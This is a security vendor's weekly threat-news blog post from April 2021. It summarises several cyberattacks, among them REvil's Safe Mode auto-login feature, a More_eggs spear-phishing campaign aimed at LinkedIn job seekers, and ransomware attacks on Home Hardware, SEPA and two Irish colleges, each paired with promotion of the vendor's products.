Cyberthreat update from Acronis CPOCs: Week of April 12, 2021

Here at Acronis, we’re always monitoring for dangers to your data, deploying updates to handle newly-discovered vulnerabilities, and issuing alerts and recommendations to help you stay protected. Our global network of Acronis Cyber Protection Operations Centers (CPOCs) continue to work around the clock to proactively detect and defend against the latest cyberthreats.

Part of this work includes video updates to inform you of modern hazards in the digital landscape — such as new cyberthreat campaigns and ransomware strikes against major organizations. Here’s a look at some of the most recent breaking news and analyses:

New REvil feature guarantees auto-login in Safe Mode

The REvil cyberthreat gang recently added a new feature to their Sodinokibi ransomware, allowing it to perform the encryption process in Safe Mode but requiring a manual reboot. Now, the gang has refined this feature to be more effective.

With this latest update, REvil’s ransomware can now automatically log back into the system after rebooting. The malware changes the logged-on user’s password and makes Registry edits to ensure Windows will sign in automatically using the new information.

Ransomware gangs continue to evolve their attacks, and REvil’s ransom demands consistently make headlines — like their $50 million strike against computing giant Acer last month. Acronis Cyber Protect features an advanced heuristic engine recognizes and blocks malicious processes before they can impact your systems and data.

More_eggs aimed at job hunters on LinkedIn

A personalized spear-phishing attack campaign from the Golden Chickens cyberthreat group uses personal information mined from LinkedIn to piece together fake job offers. Victims receiving these messages are enticed to open a malicious attachment, which installs the More_eggs backdoor.

The malicious attachment is a .zip archive containing an LNK file. This file abuses Windows Management Instrumentation (WMI) to start a script that uses CMSTP and RegSvr32 to download and register a malicious ActiveX control from Amazon Cloud. Abusing legitimate system tools for malicious purposes is an example of what cyberthreat researchers call “living-off-the-land” tactics.

The More_eggs backdoor, once established, provides the attackers with remote access to the system and can lead to installation of further threats — including banking malware, credential stealers, and ransomware. Acronis Cyber Protect Cloud detects and blocks malicious behaviors, including those characteristic of backdoors, before they can spread inside your organization.

Canadian chain Home Hardware Stores hit by DarkSide ransomware

One of Canada's largest hardware retailers, Home Hardware Stores, is the latest victim to the DarkSide ransomware gang. DarkSide's leak site claims that the group has stolen 300 GB of sensitive data, including financial documents, project details, contracts, and NDAs.

To ratchet up the pressure, DarkSide has created countdown clocks on their website and is leaking data every 24 hours until Home Hardware Stores pays the demanded ransom. The amount of money requested is not publicly known at this time, but previous demands by the group have ranged from $200,000–$2 million.

Home Hardware Stores is an undeniably high-value target. The chain has over 1,050 stores to its name, with an estimated annual revenue of $4.85 billion. The best way for any organization to avoid ransomware negotiations is by detecting cyberthreats before they steal and encrypt data. Acronis Cyber Protect recognizes DarkSide's ransomware and stops it in its tracks.

SEPA ransomware recovery expected to last into 2022

On Christmas Eve of 2020, the Scottish Environment Protection Agency (SEPA) suffered a Conti ransomware attack. The agency has refused to pay the ransom, and has been working with data recovery specialists since December to restore their systems and more than 4,000 stolen files.

As of early April 2021, SEPA has been able to get around 70% of their staff back online, but doesn't expect to have systems and data fully restored until sometime in 2022.

In addition to the toll that system downtime has taken on the agency, the stolen data has been leaked on the dark web. This attack has cost SEPA nearly £800,000 in response and recovery expenses. SEPA is not relying on reclaiming copies of leaked files due to the likelihood of these files being infected.

Ransomware attacks can be incredibly costly, whether or not you pay the demands. The best option is to prevent the attack in the first place. Acronis Cyber Protect Cloud uses behavioral and AI-based detection engines to stop Conti and other ransomware before they can steal your data or encrypt your systems.

Classes halted after two Irish colleges suffer cyberattacks

The National College of Ireland (NCI) and Technological University of Dublin (TU Dublin) have both suffered ransomware attacks, affecting IT systems and preventing normal staff and student activities both on and off campus.

The attack on NCI has not only affected IT systems, but also backups, causing additional downtime by preventing standard recovery procedures. The school has prevented access to buildings and systems while they investigate and begin restoration.

TU Dublin was able to stop the attack quickly before it spread between campuses, and early stages of the investigation don’t indicate that any sensitive data has been exfiltrated. However, the attack did cause an ongoing shutdown of systems on the Tallaght campus, and is preventing the IT staff from responding to any IT requests at this time.

In addition to the included ransomware protection, the backups included in Acronis Cyber Protect Cloud are protected against tampering. This ensures that they’ll stay safe from ransomware, and that in the event of system compromise or data loss, a quick recovery is possible.

# # #

For the latest reports on emerging cyberthreats from Acronis’ cyber protection experts, subscribe to the Acronis YouTube channel and receive our CPOC updates as they’re posted.

Acronis' solution for protecting endpoints is now being tracked by Canalys, a leading market research firm. Learn more